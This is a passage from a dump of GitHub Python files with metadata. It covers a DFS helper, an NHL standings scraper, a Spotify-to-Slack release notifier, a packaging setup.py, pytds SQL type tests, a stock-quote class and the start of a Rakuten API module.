"pandas.merge", "line_number": 153, "usage_type": "call"}, {"api_name": "extract_data.urbanHeatData", "line_number": 157, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 158, "usage_type": "call"}, {"api_name": "extract_data.landUseData", "line_number": 162, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 163, "usage_type": "call"}, {"api_name": "extract_data.elevationData", "line_number": 167, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "3207363972", "text": "from typing import Dict, Tuple\n\ncat2children = {}\n\n\ndef cat_dfs(parent: str, cat2sdq_tuple: Dict[str, Tuple[str, float]]):\n children = cat2children.get(parent, [])\n parent_intent = cat2sdq_tuple.get(parent)\n child_intents = []\n for child in children:\n child_intent = cat_dfs(child, cat2sdq_tuple)\n if child_intent:\n child_intents.append(child_intent)\n if parent_intent is None:\n return child_intents\n intents = []\n for child_intent in child_intents:\n if child_intent[1] - parent_intent >= -1e-3:\n intents.append(child_intent)\n return intents if intents else [parent_intent]\n\n\n", "repo_name": "foreverxujiahuan/algorithm", "sub_path": "dfs/cat_dfs.py", "file_name": "cat_dfs.py", "file_ext": "py", "file_size_in_byte": 650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "33802124577", "text": "import helpers\nimport json\n\n\ndef get_standings():\n \"\"\"\n Get the current standing as per the NHL\n \n :return: Json of teams\n \"\"\"\n response = helpers.get_page(\"https://statsapi.web.nhl.com/api/v1/standings\")\n\n return json.loads(response)\n\n\ndef parse_json(standings):\n \"\"\"\n Parse the standing json\n \n :param standings: json of standings\n \n :return: dict \n \"\"\"\n team_standings = dict()\n\n for division in standings['records']:\n for team in division['teamRecords']:\n team_standings[helpers.TEAMS[team['team']['name'].upper()]] = {\n 'team': helpers.TEAMS[team['team']['name'].upper()],\n \"ROW\": team['leagueRecord']['wins'] * 2 + team['leagueRecord']['ot'],\n 'points': team['leagueRecord']['wins'] * 2 + team['leagueRecord']['ot'],\n \"GD\": team['goalsScored'] - team['goalsAgainst'],\n 'round_1': 0,\n 'round_2': 0,\n 'round_3': 0,\n 'round_4': 0,\n 'champion': 0\n }\n\n return team_standings\n\n\ndef scrape_todays_standings():\n \"\"\"\n Scrapes standings as of today\n \n :return: dictionary: keys -> teams, value -> {wins, ot}\n \"\"\"\n return parse_json(get_standings())\n\n\ndef main():\n print(json.dumps(scrape_todays_standings(), indent=2))\n\n\nif __name__ == \"__main__\":\n main()", "repo_name": "HarryShomer/OffsideReview-Stats", "sub_path": "season_projections/todays_standings.py", "file_name": "todays_standings.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "helpers.get_page", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}, {"api_name": "helpers.TEAMS", "line_number": 28, "usage_type": "attribute"}, {"api_name": "helpers.TEAMS", "line_number": 29, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "2584467579", "text": "import json\nimport datetime\nfrom dotenv import dotenv_values\n\nfrom spotify import Spotify\nfrom slack import Slack\n\ndef main():\n config = dotenv_values(\".env\")\n slack_url_album_global = config[\"SLACK_WEBHOOK_URL_ALBUM_GLOBAL\"]\n slack_url_single_global = config[\"SLACK_WEBHOOK_URL_SINGLE_GLOBAL\"]\n slack_url_album_japan = config[\"SLACK_WEBHOOK_URL_ALBUM_JAPAN\"]\n slack_url_single_japan = config[\"SLACK_WEBHOOK_URL_SINGLE_JAPAN\"]\n\n client_id = config[\"SPOTIFY_CLIENT_ID\"]\n client_secret = config[\"SPOTIFY_CLIENT_SECRET\"]\n\n spotify = Spotify()\n spotify.authorize(client_id, client_secret)\n\n new_releases_japan = spotify.get_new_releases_by_country(\"JP\")\n albums_japan, singles_japan = separate_releases_into_albums_and_singles(new_releases_japan)\n print(f\"released today in Japan: albums: {len(albums_japan)}, singles: {len(singles_japan)}\")\n notify_new_releases_album(albums_japan, slack_url_album_japan) \n notify_new_releases_single(singles_japan, slack_url_single_japan)\n\n new_releases = spotify.get_new_releases_global()\n albums_global, singles_global = separate_releases_into_albums_and_singles(new_releases)\n print(f\"released today in global: albums: {len(albums_global)}, singles: {len(singles_global)}\")\n notify_new_releases_album(albums_global, slack_url_album_global)\n notify_new_releases_single(singles_global, slack_url_single_global)\n\ndef get_combined_artists_name(artists):\n artists_buff = []\n for i, artist in enumerate(artists):\n artists_buff.append(artist[\"name\"])\n artists = \", \".join(artists_buff)\n return artists\n\ndef separate_releases_into_albums_and_singles(items):\n d_today = datetime.date.today()\n # d_today = \"2022-03-18\"\n print(d_today)\n albums = []\n singles = []\n\n for item in items:\n # print(item[\"release_date\"])\n if str(d_today) != item[\"release_date\"]:\n continue\n\n if item[\"album_type\"] == \"album\":\n albums.append(item)\n continue\n elif item[\"album_type\"] == \"single\":\n singles.append(item)\n continue\n else:\n print(f\"unknown album_type?: {item['album_type']}\")\n continue\n\n return albums, singles\n\ndef notify_new_releases_album(items, url): \n data = {\n \"blocks\": []\n }\n\n if len(items) == 0:\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": \"Seems like no releases for today...🥺\"\n }\n }\n )\n else:\n for item in items:\n artists = get_combined_artists_name(item[\"artists\"])\n album_title = item[\"name\"]\n spotify_link = item[\"external_urls\"][\"spotify\"]\n # 用意されているサムネは常に[640x640, 300x300, 64x64]の3種類という前提\n thumbnail_url = item[\"images\"][1][\"url\"]\n\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"*{album_title}* \\n{artists}\\n<{spotify_link}|Listen On Spotify>\"\n },\n \"accessory\": {\n \"type\": \"image\",\n \"image_url\": thumbnail_url,\n \"alt_text\": \"alt text for image\"\n }\n }\n )\n\n slack = Slack(url)\n slack.post(data)\n\ndef notify_new_releases_single(items, url):\n data = {\n \"blocks\": []\n }\n\n if len(items) == 0:\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": \"Seems like no releases for today...🥺\"\n }\n }\n )\n else:\n for item in items:\n artists = get_combined_artists_name(item[\"artists\"])\n album_title = item[\"name\"]\n spotify_link = item[\"external_urls\"][\"spotify\"]\n # 用意されているサムネは常に[640x640, 300x300, 64x64]の3種類という前提\n thumbnail_url = item[\"images\"][1][\"url\"]\n\n data[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"*{album_title}* \\n{artists}\\n<{spotify_link}|Listen On Spotify>\"\n },\n \"accessory\": {\n \"type\": \"image\",\n \"image_url\": thumbnail_url,\n \"alt_text\": \"alt text for image\"\n }\n }\n )\n\n slack = Slack(url)\n slack.post(data)\n\nif __name__ == \"__main__\":\n main()", "repo_name": "kyokyokyo0217/spotify-python-sandbox", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dotenv.dotenv_values", "line_number": 9, "usage_type": "call"}, {"api_name": "spotify.Spotify", "line_number": 18, "usage_type": "call"}, {"api_name": "spotify.authorize", "line_number": 19, "usage_type": "call"}, {"api_name": "spotify.get_new_releases_by_country", "line_number": 21, "usage_type": "call"}, {"api_name": "spotify.get_new_releases_global", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "attribute"}, {"api_name": "slack.Slack", "line_number": 102, "usage_type": "call"}, {"api_name": "slack.post", "line_number": 103, "usage_type": "call"}, {"api_name": "slack.Slack", "line_number": 143, "usage_type": "call"}, {"api_name": "slack.post", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "26886764039", "text": "# coding=utf-8\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport codecs\nimport os\nimport sys\nfrom distutils.core import setup, Command\nfrom shutil import rmtree\n\nfrom setuptools import find_packages # , setup, Command\n\ntry:\n FileNotFoundError\nexcept NameError:\n FileNotFoundError = IOError\n\nPROJECT_NAME = \"pypi_librarian\"\n\nhere = os.path.abspath(os.path.dirname(__file__))\nwith codecs.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\nabout = {}\nwith open(os.path.join(here, PROJECT_NAME, \"_version.py\")) as f:\n exec(f.read(), about)\nif sys.argv[-1] == \"publish\":\n os.system(\"python setup.py sdist bdist_wheel upload\")\n sys.exit()\nrequired = [\n 'docopt', # command line parser\n 'lxml',\n 'pypi-xmlrpc',\n 'requests',\n 'yolk3k'\n]\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py publish.\"\"\"\n description = 'Build and publish the package.'\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Prints things in bold.\"\"\"\n print('\\033[1m{0}\\033[0m'.format(s))\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n try:\n self.status('Removing previous builds…')\n rmtree(os.path.join(here, 'dist'))\n except FileNotFoundError:\n pass\n self.status('Building Source distribution…')\n os.system('{0} setup.py sdist'.format(sys.executable))\n\n self.status('Not uploading to PyPi, not tagging github…')\n self.status('Uploading the package to PyPi via Twine…')\n\n os.system('twine upload dist/*')\n self.status('Pushing git tags…')\n os.system('git tag v{0}'.format(about['__version__']))\n os.system('git push --tags')\n sys.exit()\n\nsetup(\n name=PROJECT_NAME,\n version=about['__version__'],\n description='Opinionated, no config build version incrementer. No regex. Drop in and go.',\n long_description=long_description,\n # markdown is not supported. Easier to just convert md to rst with pandoc\n # long_description_content_type='text/markdown',\n author='Matthew Martin',\n author_email='matthewdeanmartin@gmail.com',\n url='https://github.com/matthewdeanmartin/' + PROJECT_NAME,\n packages=find_packages(exclude=['test', 'test.*']),\n entry_points={\n\n 'console_scripts': [\n 'pypi_librarian=pypi_librarian.main:process_docopts',\n ]\n },\n install_requires=required,\n extras_require={},\n include_package_data=True,\n license='MIT',\n keywords=\"pypi, package metadata\",\n classifiers=[\n 'Programming Language :: Python',\n # 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: Implementation :: CPython',\n #'Programming Language :: Python :: Implementation :: PyPy',\n ],\n cmdclass={'upload': UploadCommand, },\n setup_requires=[],\n)\n", "repo_name": "matthewdeanmartin/pypi_librarian", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 3038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 27, "usage_type": "call"}, {"api_name": "distutils.core.Command", "line_number": 37, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 60, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 65, "usage_type": "call"}, {"api_name": "os.system", "line_number": 67, "usage_type": "call"}, {"api_name": "os.system", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "distutils.core.setup", "line_number": 71, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "71233635073", "text": "# coding=utf-8\nimport datetime\nfrom decimal import Decimal, Context\nimport uuid\n\nimport pytest\nimport six\n\nimport pytds\n\nfrom fixtures import *\n\n\n@pytest.mark.parametrize('sql_type', [\n \"tinyint\",\n \"smallint\",\n \"int\",\n \"bigint\",\n \"real\",\n \"float\",\n \"smallmoney\",\n \"money\",\n \"decimal\",\n \"varbinary(15)\",\n \"binary(15)\",\n \"nvarchar(15)\",\n \"nchar(15)\",\n \"varchar(15)\",\n \"char(15)\",\n \"bit\",\n \"smalldatetime\",\n \"date\",\n \"time\",\n \"datetime\",\n \"datetime2\",\n \"datetimeoffset\",\n \"uniqueidentifier\",\n \"sql_variant\",\n])\ndef test_null_parameter(cursor, sql_type):\n cursor.execute(\"set nocount on; declare @x {} = %s; select @x\".format(sql_type), (None,))\n val, = cursor.fetchone()\n assert val is None\n\n\ndef test_reading_values(cursor):\n cur = cursor\n with pytest.raises(pytds.ProgrammingError):\n cur.execute(u'select ')\n assert 'abc' == cur.execute_scalar(\"select cast('abc' as varchar(max)) as fieldname\")\n assert 'abc' == cur.execute_scalar(\"select cast('abc' as nvarchar(max)) as fieldname\")\n assert b'abc' == cur.execute_scalar(\"select cast('abc' as varbinary(max)) as fieldname\")\n #assert 12 == cur.execute_scalar('select cast(12 as bigint) as fieldname')\n assert 12 == cur.execute_scalar('select cast(12 as smallint) as fieldname')\n assert -12 == cur.execute_scalar('select -12 as fieldname')\n assert 12 == cur.execute_scalar('select cast(12 as tinyint) as fieldname')\n assert True == cur.execute_scalar('select cast(1 as bit) as fieldname')\n assert 5.1 == cur.execute_scalar('select cast(5.1 as float) as fieldname')\n cur.execute(\"select 'test', 20\")\n assert ('test', 20) == cur.fetchone()\n assert 'test' == cur.execute_scalar(\"select 'test' as fieldname\")\n assert 'test' == cur.execute_scalar(\"select N'test' as fieldname\")\n assert 'test' == cur.execute_scalar(\"select cast(N'test' as ntext) as fieldname\")\n assert 'test' == cur.execute_scalar(\"select cast(N'test' as text) as fieldname\")\n assert 'test ' == cur.execute_scalar(\"select cast(N'test' as char(5)) as fieldname\")\n assert 'test ' == cur.execute_scalar(\"select cast(N'test' as nchar(5)) as fieldname\")\n assert b'test' == cur.execute_scalar(\"select cast('test' as varbinary(4)) as fieldname\")\n assert b'test' == cur.execute_scalar(\"select cast('test' as image) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as image) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as varbinary(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as ntext) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as nvarchar(max)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as xml)\")\n assert None is cur.execute_scalar(\"select cast(NULL as varchar(max)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as nvarchar(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as varchar(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as nchar(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as char(10)) as fieldname\")\n assert None == cur.execute_scalar(\"select cast(NULL as char(10)) as fieldname\")\n assert 5 == cur.execute_scalar('select 5 as fieldname')\n with pytest.raises(pytds.ProgrammingError) as ex:\n cur.execute_scalar('create table exec_scalar_empty(f int)')\n # message does not have to be exact match\n assert \"Previous statement didn't produce any results\" in str(ex.value)\n\n\ndef test_money(cursor):\n cur = cursor\n assert Decimal('0') == cur.execute_scalar(\"select cast('0' as money) as fieldname\")\n assert Decimal('1') == cur.execute_scalar(\"select cast('1' as money) as fieldname\")\n assert Decimal('1.5555') == cur.execute_scalar(\"select cast('1.5555' as money) as fieldname\")\n assert Decimal('1234567.5555') == cur.execute_scalar(\"select cast('1234567.5555' as money) as fieldname\")\n assert Decimal('-1234567.5555') == cur.execute_scalar(\"select cast('-1234567.5555' as money) as fieldname\")\n assert Decimal('12345.55') == cur.execute_scalar(\"select cast('12345.55' as smallmoney) as fieldname\")\n\n\ndef test_strs(cursor):\n cur = cursor\n assert isinstance(cur.execute_scalar(\"select 'test'\"), six.text_type)\n\n\n@pytest.mark.parametrize('val', [u'hello',\n u'x' * 5000,\n 'x' * 9000,\n 123,\n -123,\n 123.12,\n -123.12,\n 10 ** 20,\n 10 ** 38 - 1,\n -10 ** 38 + 1,\n datetime.datetime(2011, 2, 3, 10, 11, 12, 3000),\n Decimal('1234.567'),\n Decimal('1234000'),\n Decimal('9' * 38),\n Decimal('0.' + '9' * 38),\n Decimal('-' + ('9' * 38), Context(prec=38)),\n Decimal('1E10'),\n Decimal('1E-10'),\n Decimal('0.{0}1'.format('0' * 37)),\n None,\n 'hello',\n '',\n pytds.Binary(b''),\n pytds.Binary(b'\\x00\\x01\\x02'),\n pytds.Binary(b'x' * 9000),\n 2 ** 63 - 1,\n False,\n True,\n uuid.uuid4(),\n u'Iñtërnâtiônàlizætiøn1',\n u'\\U0001d6fc',\n ])\ndef test_select_values(cursor, val):\n cursor.execute('select %s', (val,))\n assert cursor.fetchone() == (val,)\n assert cursor.fetchone() is None\n\n\nuuid_val = uuid.uuid4()\n\n\n@pytest.mark.parametrize('result,sql', [\n (None, \"cast(NULL as varchar)\"),\n ('test', \"cast('test' as varchar)\"),\n ('test ', \"cast('test' as char(5))\"),\n ('test', \"cast(N'test' as nvarchar)\"),\n ('test ', \"cast(N'test' as nchar(5))\"),\n (Decimal('100.55555'), \"cast(100.55555 as decimal(8,5))\"),\n (Decimal('100.55555'), \"cast(100.55555 as numeric(8,5))\"),\n (b'test', \"cast('test' as varbinary)\"),\n (b'test\\x00', \"cast('test' as binary(5))\"),\n (datetime.datetime(2011, 2, 3, 10, 11, 12, 3000), \"cast('2011-02-03T10:11:12.003' as datetime)\"),\n (datetime.datetime(2011, 2, 3, 10, 11, 0), \"cast('2011-02-03T10:11:00' as smalldatetime)\"),\n (uuid_val, \"cast('{0}' as uniqueidentifier)\".format(uuid_val)),\n (True, \"cast(1 as bit)\"),\n (128, \"cast(128 as tinyint)\"),\n (255, \"cast(255 as tinyint)\"),\n (-32000, \"cast(-32000 as smallint)\"),\n (2000000000, \"cast(2000000000 as int)\"),\n (2000000000000, \"cast(2000000000000 as bigint)\"),\n (0.12345, \"cast(0.12345 as float)\"),\n (0.25, \"cast(0.25 as real)\"),\n (Decimal('922337203685477.5807'), \"cast('922,337,203,685,477.5807' as money)\"),\n (Decimal('-214748.3648'), \"cast('- 214,748.3648' as smallmoney)\"),\n])\ndef test_sql_variant_round_trip(cursor, result, sql):\n if not pytds.tds_base.IS_TDS71_PLUS(cursor.connection):\n pytest.skip('Requires TDS7.1+')\n cursor.execute(\"select cast({0} as sql_variant)\".format(sql))\n val, = cursor.fetchone()\n assert result == val\n\n\ndef test_collations(cursor, collation_set):\n coll_name_set = collation_set\n\n tests = [\n ('Привет', 'Cyrillic_General_BIN'),\n ('Привет', 'Cyrillic_General_BIN2'),\n ('สวัสดี', 'Thai_CI_AI'),\n ('你好', 'Chinese_PRC_CI_AI'),\n ('こんにちは', 'Japanese_CI_AI'),\n ('안녕하세요.', 'Korean_90_CI_AI'),\n ('你好', 'Chinese_Hong_Kong_Stroke_90_CI_AI'),\n ('cześć', 'Polish_CI_AI'),\n ('Bonjour', 'French_CI_AI'),\n ('Γεια σας', 'Greek_CI_AI'),\n ('Merhaba', 'Turkish_CI_AI'),\n ('שלום', 'Hebrew_CI_AI'),\n ('مرحبا', 'Arabic_CI_AI'),\n ('Sveiki', 'Lithuanian_CI_AI'),\n ('chào', 'Vietnamese_CI_AI'),\n ('ÄÅÆ', 'SQL_Latin1_General_CP437_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_CP850_BIN'),\n ('ŠşĂ', 'SQL_Slovak_CP1250_CS_AS_KI_WI'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1251_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_Cp1_CS_AS_KI_WI'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1253_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1254_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1255_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1256_BIN'),\n ('ÁÂÀÃ', 'SQL_Latin1_General_1257_BIN'),\n ('ÁÂÀÃ', 'Latin1_General_100_BIN'),\n ]\n for s, coll in tests:\n if coll not in coll_name_set:\n logger.info('Skipping {}, not supported by current server'.format(coll))\n continue\n assert cursor.execute_scalar(\"select cast(N'{}' collate {} as varchar(100))\".format(s, coll)) == s\n\n\ndef skip_if_new_date_not_supported(conn):\n if not pytds.tds_base.IS_TDS73_PLUS(conn):\n pytest.skip('Test requires new date types support, SQL 2008 or newer is required')\n\n\ndef test_date(cursor):\n skip_if_new_date_not_supported(cursor.connection)\n date = pytds.Date(2012, 10, 6)\n cursor.execute('select %s', (date, ))\n assert cursor.fetchall() == [(date,)]\n\n\ndef test_time(cursor):\n skip_if_new_date_not_supported(cursor.connection)\n time = pytds.Time(8, 7, 4, 123000)\n cursor.execute('select %s', (time, ))\n assert cursor.fetchall() == [(time,)]\n\n\ndef test_datetime(cursor):\n time = pytds.Timestamp(2013, 7, 9, 8, 7, 4, 123000)\n cursor.execute('select %s', (time, ))\n assert cursor.fetchall() == [(time,)]\n", "repo_name": "denisenkom/pytds", "sub_path": "tests/types_test.py", "file_name": "types_test.py", "file_ext": "py", "file_size_in_byte": 9996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 180, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytest.mark.parametrize", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 48, "usage_type": "call"}, {"api_name": "pytds.ProgrammingError", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 81, "usage_type": "call"}, {"api_name": "pytds.ProgrammingError", "line_number": 81, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 89, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 90, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 91, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 92, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 93, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 94, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 102, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 102, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 113, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 114, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 115, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 116, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 117, "usage_type": "call"}, {"api_name": "decimal.Context", "line_number": 117, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 118, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 119, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 120, "usage_type": "call"}, {"api_name": "pytds.Binary", "line_number": 124, "usage_type": "call"}, {"api_name": "pytds.Binary", "line_number": 125, "usage_type": "call"}, {"api_name": "pytds.Binary", "line_number": 126, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 130, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 140, "usage_type": "call"}, {"api_name": "pytds.tds_base.IS_TDS71_PLUS", "line_number": 168, "usage_type": "call"}, {"api_name": "pytds.tds_base", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pytest.skip", "line_number": 169, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 143, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 143, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 149, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 154, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 164, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 165, "usage_type": "call"}, {"api_name": "pytds.tds_base.IS_TDS73_PLUS", "line_number": 214, "usage_type": "call"}, {"api_name": "pytds.tds_base", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytest.skip", "line_number": 215, "usage_type": "call"}, {"api_name": "pytds.Date", "line_number": 220, "usage_type": "call"}, {"api_name": "pytds.Time", "line_number": 227, "usage_type": "call"}, {"api_name": "pytds.Timestamp", "line_number": 233, "usage_type": "call"}]} +{"seq_id": "13726716576", "text": "#coding=utf-8\n\nimport requests\nimport time\nimport ujson\n\n\nclass Point:\n\n sinaURL = 'http://hq.sinajs.cn'\n\n def __init__(self):\n #股票代码\n self.code = None\n #股票名称\n self.name = None\n #开盘价\n self.dayBegin = None\n #收盘价\n self.dayEnd = None\n #昨日收盘价\n self.lastdayEnd = None\n #当前价格\n self.now = None\n #今日最高价\n self.dayMax = None\n #今日最低价\n self.dayMin = None\n #成交的股票数, 由于股票交易以一百股为基本单位,所以在使用时,通常把该值除以一百\n #成交金额,单位w元\n #当前时间\n self.time = None\n\n @classmethod\n def getNow(cls, code):\n url = cls.sinaURL + '/list=' + code.lower()\n r = requests.get(url, timeout=10)\n fields = r.text.replace('var hq_str_' + code + '=',\n '').replace(\"\\\"\", '').split(',')\n p = Point()\n p.code, p.name, p.dayBegin, p.lastdayEnd, p.now, p.dayMax, p.dayMin, p.time = code, fields[\n 0], float(fields[1]), float(fields[2]), float(fields[3]), float(\n fields[4]), float(fields[5]), ' '.join(\n [fields[-3], fields[-2]])\n return p\n\n def dump(self):\n m = {\n 'code': self.code,\n 'name': self.name,\n 'dayBegin': self.dayBegin,\n 'dayEnd': self.dayEnd,\n 'lastdayEnd': self.lastdayEnd,\n 'now': self.now,\n 'dayMax': self.dayMax,\n 'dayMin': self.dayMin,\n 'time': self.time,\n }\n for k, v in m.items():\n print(k + ':' + str(v) + \"(%s)\" % type(v))\n\n def toString(self):\n m = {\n 'code': self.code,\n 'name': self.name,\n 'dayBegin': self.dayBegin,\n 'dayEnd': self.dayEnd,\n 'lastdayEnd': self.lastdayEnd,\n 'now': self.now,\n 'dayMax': self.dayMax,\n 'dayMin': self.dayMin,\n 'time': self.time,\n }\n return ujson.dumps(m)\n\n @classmethod\n def isStcokTime(cls):\n '''\n 判断当前是否为A股交易时间\n '''\n return True\n curStamp = time.time()\n t = time.localtime(curStamp)\n if t.tm_wday not in [0, 1, 2, 3, 4]: return False\n beginTime = int(\n time.mktime(\n time.strptime(\n \"%s-%s-%s 00:00:00\" % (t.tm_year, t.tm_mon, t.tm_mday),\n \"%Y-%m-%d %H:%M:%S\")))\n time_9_30 = beginTime + 9 * 3600 + 1800\n time_11_30 = beginTime + 11 * 3600 + 1800\n time_13_00 = beginTime + 13 * 3600\n time_15_00 = beginTime + 15 * 3600\n if curStamp >= time_9_30 and curStamp <= time_11_30 or curStamp >= time_13_00 and curStamp <= time_15_00:\n return True\n return False\n", "repo_name": "lycclsltt/stock", "sub_path": "lib/point.py", "file_name": "point.py", "file_ext": "py", "file_size_in_byte": 2946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "ujson.dumps", "line_number": 74, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 83, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 86, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "28421753482", "text": "\n\nfrom random import choice\nimport urllib2\nimport urllib\nimport json\nimport re\n\nfrom django.conf import settings\nfrom lxml import etree\n\nfrom .base import VendorBase, ProductOverview\n\n\nRAKUTEN_ENDPOINT = \"https://app.rakuten.co.jp/services/api/Product/Search/20140305\"\n\nWEIGHT_PATTERN = re.compile(\"[0-9,\\.]+\\s*k?g\", re.IGNORECASE)\n\ndef find_weight(keyvalues):\n if not keyvalues: return \"\"\n\n for item in keyvalues:\n if \"detail\" in item:\n d = item[\"detail\"]\n name = item.get(\"name\") or \"\"\n value = item.get(\"value\") or \"\"\n m = WEIGHT_PATTERN.search(value)\n if m: return m.group()\n\n return \"\"\n \nclass 